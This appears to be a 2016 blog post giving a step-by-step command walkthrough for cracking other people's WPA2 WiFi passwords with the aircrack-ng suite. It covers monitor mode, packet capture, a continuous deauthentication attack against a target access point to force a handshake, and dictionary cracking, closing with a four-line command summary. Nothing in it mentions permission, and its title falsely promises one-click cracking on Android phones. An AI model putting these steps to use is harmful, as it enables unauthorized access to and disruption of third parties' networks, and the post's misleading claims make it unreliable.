Wednesday, March 23, 2016

Hack Any WiFi Password on Your Android phone by installing Kali Linux {2016 Updated}

Hello Friends,
             Today We Are Presenting Amazing Hacking Trick , This Hacking Trick Only For Rooted Android Mobile phones. First Root your Mobile then Read the complete article to see the method.

Cracking WPA2 Wifi password is not a easy task, so now o can hack it with a click where you don’t need any software for this.

1- Kali Linux or any Linux system with aircrack-ng installed
     A- if you don’t have aircrack-ng suite get it by this commend in terminal
     sudo apt-get install aircrack-ng

2- A Wireless NetWork Adapter that support Monitor Mode like
     A- Alfa 2W AWUS036NH
     B- Alfa AWUS036H
     C- wifiy-city 56G
3- A word list comprising of all the possible different combination of pass-phrases
     Now let’s get to work
     I will be using wifiy-city 56G card on Kali linux 2 sana

  • Open up your terminal as root and type " ifconfig "
            This will display you all the networking interfaces that are connected to your device.

            If your wireless network adapter is working fine you should see the " wlan0 " the name may change if you have more then one connected wireless adapter.
  • Now to start Monitor Mode type

            airmon-ng start wlan0
            ‘airmon-ng’ is a traffic monitoring tool
            ‘wlan0’ is your wireless interface
            after this command we started the monitor mode
            as we know that the monitor mode is working under wlan0mon , so this is your card name for now
            in the red area a list of process id’s that cause trouble during the process so kill those processes by typing
            kill <pid>
            So, according to me :
            kill 743 898 1070 1071 1081
            now type " ifconfig " and this will display the newly set monitoring interface i.e, wlan0mon . in most case it will be mon0.
  • To show list of available WiFi network type

            airodump-ng wlan0mon

            airodump-ng is a wifi packets capturing tool
            wlan0mon is my  monitoring interface
            airodump-ng  will start capturing all packets and from the captured packets
            select your target and note its "bssid " (bssid = base service set identifier) and channel
            then stop the capture using " cntrl+c ".
  • Start capturing the packets of your target network
            Type the following command

            airodump-ng -c <channel> -w <name> –bssid <bssid> wlan0mon
            i.e:  airodump-ng -c 2 -w wifi –bssid C0:4A:00:F0:F4:24 wlan0mon

            This Will Now starting capturing of packets.
            and if you get the handshake you wont need the aireplay command…
            if you don’t get the handshake yet
            while the capturing of packets goes on, open a new terminal as root and type
            aireplay-ng -0 0 -a <bssid> mon0
            aireplay-ng = tool for deauthentication, fake authentication and other packet injections,
            -0 = number associated for deauthentication,
            0 = deauth count,
            -a = bssid) here we are trying to send a deauthentication request.
            according to me,  the command looks like
            aireplay-ng -0 0 -a C0:4A:00:F0:F4:24 wlan0mon

            After few seconds stop it using  "cntrl+c"
            Now after we have successful captured the wpa handshake
  • Stop the capturing using cntrl+c and type “ls” that would bring up all the current directories and files.

            Select the file with “.cap“extension and type the following command
            aircrack-ng -w <full location of the word list> <name of the file>
            aircrack-ng is a tool that helps in cracking the password
            In my case the command looks like
            aircrack-ng -w /usr/share/wordlists/more_than_8.txt ********-01.cap
            For the Wordlist Check this Post Best Password dictionary
            Now it starts finding suitable pass phrase. And now all you have to do is wait till you see the lovely news ( KEY Found  ( your key is here ).

all Step in few lines
  1. airodump-ng wlan0mon
  2. airodump-ng -c 9 -w wifi  –bssid C4:6E:1F:F6:34:B8 wlan0mon
  3. aireplay-ng -0 0 -a C4:6E:1F:F6:34:B8 wlan0mon
  4. aircrack-ng -w /usr/share/wordlists/more_than_8.txt wifi-01.cap




0 comments

Post a Comment